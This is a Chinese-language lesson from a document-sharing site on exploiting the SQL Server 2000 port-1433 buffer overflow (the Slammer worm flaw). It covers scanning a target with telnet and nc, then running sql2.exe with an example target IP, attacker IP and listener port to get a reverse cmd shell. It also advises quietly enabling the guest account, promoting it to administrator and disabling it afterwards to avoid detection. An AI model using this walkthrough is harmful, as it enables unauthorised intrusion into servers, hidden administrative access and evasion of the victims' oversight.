mssql远程溢出工具.docVIP

  • 140
  • 0
  • 约1.71千字
  • 约 7页
  • 2018-03-28 发布于浙江
  • 举报
mssql远程溢出工具

Sql2 mssql远程溢出工具 首先,我给大家介绍一下SQL溢出漏洞。在2003年1月25日,互联网上出现了一种新型的蠕虫病毒——“2003蠕虫王”,此病毒的危害性远远超过了曾经肆虐一时的“红色代码”病毒。如果感染该蠕虫病毒后网络带宽大量占用,最终导致网络瘫痪。该蠕虫病毒就是利用SQL server 2000 的解析端口1433 的缓冲区溢出的漏洞,对其网络进行攻击的。当时,由于“2003蠕虫王”病毒具有极强的传播能力,在亚洲、美洲、澳大利亚等地迅速传播,造成了全球性的网络灾害。 此蠕虫病毒攻击微软windows操作系统下的SQL server 2000 服务器,受影响的系统包括: Microsft SQL server 2000 sp2 Microsft SQL server 2000 sp1 Microsft SQL server 2000 desktop engine Microsft SQL server 2000 这种大规模的攻击是利用了microsoft 送消息到这个端口来查询目前可用的连接方式(连接方式可以是命名管道也可以是TCP).但是此程序存在严重漏洞,当客户端发送超长数据包时,将导致缓冲区溢出,恶意黑客利用此漏洞可以在远程机器上执行自己准备好的恶意代码。 病毒的具体做法是发送包内容长度376字节的特殊格式的udp包到SQLserver 服务器的1433端口,利用sql server漏洞执行病毒代码,根据系统函数 GetTickCount产生的种子计算伪ip地址,向外部循环发送同样的数据包,造成网络数据拥塞,同时本机cpu资源99%被占用,本机将拒绝服务。 接下来,我们就来演示一下溢出的过程,首先要先扫描一下我们要攻击的对象,看对方是否有SQL server 2000 服务。这个扫描呢,不一定是非得要扫描软件,还可以通过一些其他的方法来测试: 用 telnet 连接1433端口,数据库默认的端口是1433,若1433端口没有开放则说明sql server 2000 没有安装,若1433开放则说明sql server 2000 已经安装。 测试端口没有开放示意图,出现连接失败说明这个端口没有开放。 测试端口开放示意图,出现一个空的界面,说明端口是开放的。 2. 用nc 测试端口是否开放,以下为端口没有开放。 开放端口示意图 以上两种是可以探测sql server2000 是否安装,当然也可以用扫描软件也完成。 现在我们已经确定对方的主机已经装了 sql server 接下来就是工具来溢出。 要用到的工具有 sql2.exe nc.exe ,sql2是溢出工具, nc.exe 则是监听工具。 第一步:要用 nc 工具监听端口,(端口可以随便写,只要不是占用的就可以,比如:1433是sql server 的端口, 80是web的端口,这些都是已经占用了,) 先了解一下nc 工具的使用 接着用 nc 工具监听 在打开另外一个cmd窗口 用sql2.exe进行溢出,以下是sql2 的使用帮助。sql2.exe主要是针对sql server2000 的sp0、sp1、sp2,输入的格式为 Sql2 对方主机ip 本机ip 监听端口 补丁版本 例如:sql2 192.168.1.105 192.168.1.152 123 0 进行溢出 在监听的cmd窗口中就可以得到对方主机的cmd shell,如下图所示 接下来就是看我们自己的操作了,比如我们可以建立一个帐号。但在这里我教大家一个方法不那么容易被发现,启用 guest帐户,把他提升为管理员,操作完之后在禁用,这样比较安全,不被发现。 首先,我们先看一下 guest 是否启用, 直接输入 net user guest 这可以看到guest的一些基本信息。 启用guest 帐户 给guest 修改密码 把guest 提升为管理员 等我们退出的时候呢,在把guest 用户禁用就可以了 好了,这节课主要是给大家讲一下sql server 2000 的一个溢出漏洞,大家课下自己练习一下,这节课就到这里了,下次课再见! 1

文档评论(0)

1亿VIP精品文档

相关文档